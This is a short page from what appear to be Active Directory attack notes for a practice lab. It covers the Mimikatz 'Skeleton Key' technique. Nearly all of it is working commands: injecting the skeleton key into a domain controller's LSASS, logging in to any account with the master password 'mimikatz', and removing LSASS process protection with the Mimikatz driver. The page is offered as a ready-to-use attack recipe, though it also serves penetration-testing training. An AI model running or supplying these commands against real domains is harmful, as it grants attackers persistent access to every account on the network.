Skeleton Key

Invoke-Mimikatz

Use the below command to inject a skeleton-Key

Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton' -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Skeleton Key password is : **mimikatz**

Now we can access any machine with valid username and password as mimikatz

Enter-PSSession -Computername dcorp-dc.dollarcorp.moneycorp.local -credential dcorp\Administrator

LSASS running as a protected process

In case Lsass is running as a protected process, we can still use Skeleton Key but it needs the mimikatz driver (mimidriv.sys) on disk of the target DC

mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-

PreviousGolden Ticket NextDiamond Ticket

Last updated 1 year ago

hashtagInvoke-Mimikatz

hashtagUse the below command to inject a skeleton-Key

hashtagNow we can access any machine with valid username and password as mimikatz

hashtagLSASS running as a protected process

Invoke-Mimikatz

Use the below command to inject a skeleton-Key

Now we can access any machine with valid username and password as mimikatz

LSASS running as a protected process